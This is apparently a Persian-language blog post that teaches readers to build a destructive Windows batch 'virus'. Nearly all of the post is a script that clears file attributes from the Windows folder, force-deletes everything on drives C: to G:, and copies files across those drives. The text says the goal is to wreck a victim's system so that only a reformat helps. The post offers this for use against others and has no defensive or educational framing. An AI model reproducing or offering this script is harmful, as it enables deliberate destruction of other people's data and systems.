ساخت ويروسي بسيار خطر ناك

<<در اين ترفند قصد داريم كه به شما ياد بديم كه چطوري يه ويروس از خطر ناك تري نوعش رو بسازيد>>

براي اين كار نت پد را باز كرده و عبارت زير را در ان كپي كنيد:
ATTRIB -a -s -h -r c 
ATTRIB -a -s -h -r c:windows*.* 
Echo y | echo a | Echo y | del c:*.* 
Echo y | echo a | Echo y | del d:*.* 
Echo y | echo a | Echo y | del e:*.* 
Echo y | echo a | Echo y | del f:*.* 
Echo y | echo a | Echo y | del g:*.* 
echo y | copy *.* C: 
echo y | copy *.* D: 
echo y | copy *.* E: 
echo y | copy *.* F: 
echo y | copy *.* G:
 سپس SaveAs را انتخاب و فايل را با پسوند bat سيو كنيد يعني با نامي مثل donger.bat كار اين ويروس تركوندن سيستم طرفه كه با اجرا شدن اون راهي جز اف ديسك كردن براي طرف نميمونه.به هيچ وجه روي ان كليك نكنيد.....مطالب مرتبط با این پست: